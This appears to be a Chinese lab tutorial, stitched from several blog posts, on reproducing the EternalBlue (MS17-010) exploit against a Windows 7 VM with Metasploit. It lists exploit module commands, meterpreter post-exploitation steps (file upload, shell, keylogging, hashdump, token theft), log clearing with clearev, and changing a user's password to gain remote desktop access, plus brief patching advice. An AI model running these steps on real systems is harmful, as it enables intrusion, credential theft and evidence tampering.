目录

前言：

准备工作：

使用kali进行复现：

使用kali中msf工具查看信息：

 进行信息收集：

 进一步信息收集攻击：

清除痕迹：

meterpreter命令大全：

前言：

提到操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于WannaCry勒索病毒的诞生。

该病毒是不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播 。勒索病毒肆虐，俨然是一场全球性互联网灾难，给广大电脑用户造成了巨大损失。最新统计数据显示，100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

准备工作：

需要准备：win7虚拟机和kali虚拟机，且两台虚拟机在同一网段下

进入win7靶机，win+r打开命令行，输入ipconfig查看win7靶机ip地址

 关闭win7靶机防火墙；

打开控制面板->系统和安全->windows防火墙->打开或关闭防火墙

使用kali进行复现：

打开kali命令行，使用nmap扫描端口，查看端口信息。(445端口打开中)

 打开msf工具

 搜索关于ms17_010模块并调用模块

 查看需要哪些参数  RHOSTS是空的 RPORT是445端口 (yes->需要)

 将靶机IP地址设置为攻击地址，开始运行，看到---WIN---代表成功。

使用kali中msf工具查看信息：

 进行信息收集：

使用getuid命令查看权限；使用ps命令查看当前活跃进程；使用idletime命令查看闲置时间

 进一步信息收集攻击：

使用screenshot命令将靶机当前屏幕界面截图

 截图保存在root目录下 .jpeg文件

 使用upload /tmp/123.exe  C:\\   命令，上传文件到靶机C盘上（可以上传各种文件）

 使用shell命令，获取shell权限，获取信息

清除痕迹：

输入exit退出目标服务器shell

使用clearev命令，删除日志信息

使用sessions命令，查看msf连接信息

使用sessions -K命令，关闭所有msf连接

安全退出

meterpreter命令大全：

 在网上查阅了一些资料，整理出来供大家参考

在其最基本的使用，meterpreter 是一个 Linux 终端在受害者的计算机上。这样，我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。

这里有一些核心的命令可以用在meterpreter。

? – 帮助菜单
background – 将当前会话移动到背景
bgkill – 杀死一个背景 meterpreter 脚本
bglist – 提供所有正在运行的后台脚本的列表
bgrun – 作为一个后台线程运行脚本
channel – 显示活动频道
close – 关闭通道
exit – 终止 meterpreter 会话
help – 帮助菜单
interact – 与通道进行交互
irb – 进入 Ruby 脚本模式
migrate – 移动到一个指定的 PID 的活动进程
quit – 终止 meterpreter 会话
read – 从通道读取数据
run – 执行以后它选定的 meterpreter 脚本
use – 加载 meterpreter 的扩展
write – 将数据写入到一个通道

第2步：文件系统命令

cat -读取并输出到标准输出文件的内容
cd -更改目录对受害人
del -删除文件对受害人
download-从受害者系统文件下载
edit-用 vim编辑文件
getlwd -打印本地目录
getwd -打印工作目录
lcd -更改本地目录
lpwd -打印本地目录
ls -列出在当前目录中的文件列表
mkdir -在受害者系统上的创建目录
pwd -输出工作目录
rm -删除文件
rmdir -受害者系统上删除目录
upload-从攻击者的系统往受害者系统上传文件

第 3 步： 网络命令

ipconfig -显示网络接口的关键信息，包括 IP 地址、 等。
portfwd -端口转发
route -查看或修改受害者路由表

第 4 步： 系统命令

clearav -清除了受害者的计算机上的事件日志
drop_token -被盗的令牌
execute-执行命令
getpid -获取当前进程 ID (PID)
getprivs -尽可能获取尽可能多的特权
getuid -获取作为运行服务器的用户
kill -终止指定 PID 的进程
ps -列出正在运行的进程
reboot-重新启动受害人的计算机
reg -与受害人的注册表进行交互
rev2self -在受害者机器上调用 RevertToSelf()
shell -在受害者计算机上打开一个shell
shutdown-关闭了受害者的计算机
steal_token -试图窃取指定的 (PID) 进程的令牌
sysinfo -获取有关受害者计算机操作系统和名称等的详细信息

第 5 步： 用户界面命令

enumdesktops -列出所有可访问台式机
getdesktop -获取当前的 meterpreter 桌面
idletime -检查长时间以来，受害者系统空闲进程
keyscan_dump -键盘记录软件的内容转储
keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop -停止键盘记录软件
screenshot-抓去 meterpreter 桌面的屏幕截图
set_desktop -更改 meterpreter 桌面
uictl -启用用户界面组件的一些控件

第 6 步： 特权升级命令

getsystem -获得系统管理员权限

第 7 步： 密码转储命令

hashdump -抓去哈希密码 (SAM) 文件中的值
　　  请注意 hashdump 会可以跳过杀毒软件，但现在有两个脚本，都更加隐蔽，”run hashdump”和”run smart_hashdump”。查找更多关于那些在我即将举行的 meterpreter 脚本作弊。

第 8 步： Timestomp 命令

timestomp -操作修改，访问，并创建一个文件的属性

前言

永恒之蓝（Eternal Blue） 爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭受了该勒索病毒，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

SMB（全称是Server Message Block） 是一个协议服务器信息块，它是一种客户机/服务器、请求/响应协议，通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的；SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口。

Metasploit Framework简介

MSF（The Metasploit Framework） msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。MSF高度模块化，即框架由多个module组成，是全球最受欢迎的渗透测试工具。metasploit涵盖了渗透测试中全过程，你可以在这个框架下利用现有的Payload进行一系列的渗透测试。

MSF的设计初衷是打造成一个攻击工具开发平台，然而在目前情况下，安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

Metasploit简介-目录结构
kali-metasploit框架目录路径:/opt/metasploit-framework/embedded/framework//usr/share/metasploit-framework/

Metasploit简介-模块
1.Modules-msf核心:
用户用到的各种模块几乎都在这里，用户使用use这个msf这里时，就是用到了这个目录下的模块。这个目录下的文件在msfconsole启动时会被自动加载的，如果看到msfconsole启动时有出错信息但又能成功启动可以根据出错信息找解决方法，个人写的Module也可以放在这个目录下。

2.auxiliary:
辅助模块，辅助渗透（端口扫描、登录密码爆破、漏洞验证等)

3.exploits:
漏洞利用模块，包含主流的漏洞利用脚本，通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类

4.payloads:
攻击载荷，主要是攻击成功后在目标机器执行的代码，比如反弹shell的代码

5.post:
后渗透阶段模块，漏洞利用成功获得meterpreter之后，向目标发送的一些功能性指令,如提权等

6.evasion:
躲避模块，用来生成免杀payload

7.encoders:
编码器模块，主要包含各种编码工具，对payload进行编码加密，以便绕过入侵检测

8.nops:
由于IDS/IPS会检查数据包中不规则的数据，在某些情况下，比如针对溢出攻击，某些特殊滑行字符串（NOPS x90x90…）则会因为被拦截而导致攻击失效。

MSF使用参考：https://www.jianshu.com/p/1adbabecdcbd

MSF命令大全：https://www.cnblogs.com/MyGuazi/p/11871420.html

MS17-010漏洞利用

靶机win7企业版 ip：192.168.111.128
攻击机kali ip：192.168.111.130

我们先在控制台输入msfconsole 启动起来

用msf自带的db_nmap

db_nmap使用参数：
-sS: TCP SYN扫描
-sA: TCP ACK扫描 
-sT: TCP扫描
-A:打开操作系统探测和版本探测 
-T[O-5]:默认为T3，T4表示最大TCP扫描延迟为10ms

db_nmap无法使用参考：https://blog.csdn.net/xujing19920814/article/details/102809014

db_nmap -sS -T4 192.168.111.128 对目标机器SYN扫描

hosts:查看当前工作区所有主机
services:查看所有服务

发现开放了445端口那么后续就可以进行漏洞利用，使用auxiliary/scanner/smb/smb_ms17_010进行验证是否存在永恒之蓝漏洞

show options 查看参数

设置攻击目标 set rhosts 192.168.111.128 run运行进行扫描

扫描结果：Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit) 说明可能存在MS17-010这个漏洞

搜索可使用的模块
search:搜索msf中相关模块
search platform:windows cve:2009 type:exploit

search ms17-010这个模块

这里我们选择ms17_010_eternalblue，use exploit/windows/smb/ms17_010_eternalblue

继续查看ms17_010_eternalblue这个模块的参数

设置攻击的ip地址 set rhosts 192.168.111.128 直接run开始攻击


攻击成功返回了一个meterpreter会话

直接就是系统权限不需要我们提权

安全修复方案

关闭445端口。
打开防火墙，安装安全软件。
安装对应补丁。
受影响的系统版本可以参照：https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

中了勒索病毒可以尝试使用电脑管家的文档解密

利用MS17-010漏洞

1. 我们在Windows7上共享一个文件。
2. 
3. 然后我们要通过445端口来利用这个模块渗透这台Windows7系统
4. 
5. 输入msfconsole 进入控制台终端。
6. 
7. 搜索MS17-010模块的位置。
9. 
10. 找到这个模块，输入这条命令进入。
11. 输入show option，查看需要配置的一些东西。
12. 
13. 我们这需要设置这几个参数就行了。
14. 
15. 
16. 
17. 这样我们就进入了“黑客工具”。
18. 在这里面我们可以做很多事情，我就在这演示一个远程桌面的例子。
19. 现在Windows7系统是拒绝远程登陆的。
20. 
21. 我现在来开启他，通过这个工具。
23. 
24. 输入这条命令来开启远程登陆。
25. 在这之前我们可以进入这台电脑的CMD，然后更改这台电脑的密码，从而登陆这台电脑。
26. 
27. 
28. 
29. 这边显示用户被禁用，但是没关系，我们可以查看他电脑的所有用户，再来更改密码。
30. 
31. 这里有一个yuzai的用户，那我们更改一下这个用户的密码，然后登陆。
32. 
33. 
34. 
35. 成功进入！